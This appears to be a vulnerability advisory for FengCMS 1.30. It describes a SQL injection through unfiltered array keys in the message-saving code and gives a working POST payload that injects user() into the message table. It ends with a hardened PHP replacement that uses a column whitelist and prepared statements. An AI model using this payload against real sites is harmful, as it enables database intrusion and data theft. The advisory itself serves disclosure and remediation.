### Brief description

http://www.fengcms.com/ latest version 1.30

### Details

app\model\messageModel.php

```php
public function save($array){
    // CAPTCHA check: the session value must match the submitted vcode and must not be empty.
    if($_SESSION['authnum']!=$array['vcode']||$_SESSION['authnum']==""){
        return array('status' => 'c');
    }
    unset($array['vcode']);
    // The remaining request fields are passed straight through: the array KEYS
    // become column names in the generated INSERT and are never validated.
    $re=D($this->d_name)->insert($array);
    if($re){
        $_SESSION['authnum']="";
        return array('status' => 'y','id' => $re);
    }else{
        return array('status' => 'n','id' => $re);
    }
}
```

`$re=D($this->d_name)->insert($array);` does not filter the array keys. Value escaping does not touch backticks, so a backtick inside a key closes the column-name quoting and the rest of the key is spliced into the SQL statement.

Payload:

```
POST /?controller=message&operate=save
title`,`name`,`qq`,`tel`,`mail`,`content`,`time`)values(user(),qq,qq,qq,qq,qq,1426038685);#insert/**/into/**/`f_message`/**/(`title=testsql&name=&qq=&tel=&mail=&content=aaaaaaaaaaaa&vcode=vzyd&time=1426039319
```

### Proof of vulnerability

[![fengcms#1.png](https://images.seebug.org/upload/201503/11103743036c89090cbbb5d4b50e5c656a0b0210.png)](https://images.seebug.org/upload/201503/11103743036c89090cbbb5d4b50e5c656a0b0210.png)

[![fengcms#2.png](https://images.seebug.org/upload/201503/111039099e181f84a5a3442bdcf4ac15accc0562.png)](https://images.seebug.org/upload/201503/111039099e181f84a5a3442bdcf4ac15accc0562.png)

[![fengcms3.png](https://images.seebug.org/upload/201503/11103923e543e4202ed88bbf973ce7be99002606.png)](https://images.seebug.org/upload/201503/11103923e543e4202ed88bbf973ce7be99002606.png)
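The fix for the unfiltered-key insert described in the Details section, as an added example that is not FengCMS code: column names come from a fixed whitelist instead of the request's array keys, and values are bound through prepared statements. The `f_message` column list is taken from the report's payload; the `MessageStore` class, the PDO connection and the `InvalidArgumentException` handling are assumptions.

```php
<?php
// Added example (not FengCMS code): hardened replacement for the
// D($this->d_name)->insert($array) call. The request may choose WHICH
// whitelisted columns to fill, but it can never supply a column name.

final class MessageStore
{
    // Whitelist of columns the message form may write (from the report's
    // payload). A key not in this list, including one containing a backtick,
    // is rejected instead of being spliced into the SQL as a column name.
    private const ALLOWED = ['title', 'name', 'qq', 'tel', 'mail', 'content', 'time'];

    public function __construct(private PDO $pdo) {}

    /** @param array<string,mixed> $array raw form fields, vcode already removed */
    public function insert(array $array): int
    {
        $columns = [];
        $params  = [];
        foreach ($array as $key => $value) {
            // Strict comparison: the key must BE a known column name, so the
            // backtick-escaping weakness of the value layer is irrelevant here.
            if (!in_array($key, self::ALLOWED, true)) {
                throw new InvalidArgumentException('unexpected field: ' . $key);
            }
            $columns[] = '`' . $key . '`';
            $params[':' . $key] = is_scalar($value) ? (string) $value : '';
        }
        if ($columns === []) {
            throw new InvalidArgumentException('no fields to insert');
        }
        // Column names are guaranteed whitelist members; the only
        // request-controlled data reaching MySQL goes through bound parameters.
        $sql = sprintf(
            'INSERT INTO `f_message` (%s) VALUES (%s)',
            implode(', ', $columns),
            implode(', ', array_keys($params))
        );
        $stmt = $this->pdo->prepare($sql);
        $stmt->execute($params);
        return (int) $this->pdo->lastInsertId();
    }
}
```

Rejecting unknown keys (rather than silently dropping them) also gives the application log a signal that someone is tampering with form field names.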